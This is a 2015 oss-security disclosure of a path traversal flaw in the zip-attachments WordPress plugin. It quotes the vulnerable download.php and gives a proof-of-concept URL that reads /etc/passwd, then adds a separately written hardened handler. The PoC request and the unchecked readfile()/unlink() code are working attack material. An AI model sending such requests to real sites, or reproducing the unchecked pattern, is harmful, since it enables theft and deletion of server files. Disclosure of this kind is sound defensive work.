Date: Fri, 12 Jun 2015 14:35:16 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: zip-attachments v1.1.4 wordpress plugin arbitrary file download vulnerability.

May I please have a CVE for this issue:

Title: zip-attachments v1.1.4 wordpress plugin arbitrary file download vulnerability.
Author: Larry W. Cashdollar
Date: 6/10/2015
Vendor: Rick Torres @ricard_dev
Vendor Notified: 6/11/2015
Fixed in: v1.1.5 by vendor.
Download: https://wordpress.org/plugins/zip-attachments/
CVEID: TBD
Description: Simple and lightweight plugin to add a "Download" button to your posts, pages or custom post types.

Vulnerability: zip-attachments allows arbitrary file downloads because it doesn't check the download path of the requested file.

In zip-attachments/download.php, there is no check to see if the file is outside of the intended download path:

<?php
// zip-attachments/download.php (v1.1.4): za_file comes straight from the
// request and is handed to filesize(), readfile() and unlink() with no
// check that it lies inside the directory the plugin writes archives to.
if(isset($_REQUEST['za_file']) && !empty($_REQUEST['za_file'])){

    $file = $_GET['za_file'];          // attacker-controlled path
    $filename = $_GET['za_filename'];  // attacker-controlled, echoed into a header

    header('Content-Type: application/zip');
    header('Content-Length: ' . filesize($file));
    header('Content-Disposition: attachment; filename="'.$filename.'.zip"');

    readfile($file);   // serves whatever $file points at
    unlink($file);     // and then deletes it, if the httpd user may
}

Any file readable by the httpd process can be downloaded.

PoC:
http://www.example.com/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd
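The following is an added example of how a handler for the same two parameters can be contained, written for this page; it is not the plugin's actual v1.1.5 fix and is not code from the original post. It assumes the plugin keeps its generated archives in a dedicated "zips" directory next to download.php (an assumption; the real plugin may use a different location) and uses only plain PHP so it runs without WordPress loaded, as the original download.php does.

```php
<?php
// Added example, not the vendor's v1.1.5 fix: a download handler for the same
// za_file / za_filename parameters that refuses anything outside one directory.
// Assumption: the plugin keeps its generated archives in a dedicated "zips"
// directory next to this script; adjust $base to wherever the plugin writes them.

$base = realpath(__DIR__ . '/zips');
if ($base === false) {
    http_response_code(500);
    exit;
}

// Accept only a bare file name. basename() drops every directory component,
// so "../../../../../etc/passwd" collapses to "passwd" and can no longer
// address anything outside $base.
$requested = isset($_GET['za_file']) ? basename((string) $_GET['za_file']) : '';
if ($requested === '' || substr($requested, -4) !== '.zip') {
    http_response_code(400);
    exit;
}

// Canonicalise (resolves symlinks and any remaining ".." segments) and confirm
// the result is still a regular file directly under $base. This containment
// check is what the original code lacks.
$path = realpath($base . DIRECTORY_SEPARATOR . $requested);
if ($path === false
    || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0
    || dirname($path) !== $base
    || !is_file($path)) {
    http_response_code(404);
    exit;
}

// za_filename goes into a response header, so restrict it to a safe character
// set rather than echoing user input into Content-Disposition verbatim.
$display = isset($_GET['za_filename']) ? (string) $_GET['za_filename'] : 'download';
$display = preg_replace('/[^A-Za-z0-9._-]/', '_', $display);
if ($display === '' || $display === '.' || $display === '..') {
    $display = 'download';
}

header('Content-Type: application/zip');
header('Content-Length: ' . filesize($path));
header('Content-Disposition: attachment; filename="' . $display . '.zip"');
readfile($path);
// Only now is it safe to delete: $path is known to be a one-shot archive
// inside $base, not an arbitrary httpd-writable file.
unlink($path);
```

The two checks do different jobs: basename() stops the traversal shown in the PoC, while the realpath() prefix comparison also catches a symlink planted inside the archive directory that points elsewhere. Either one alone is weaker than both together, and the unlink() stays dangerous until the path is proven to be inside the directory, since with the original code an attacker can delete as well as read any file the httpd user has access to.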
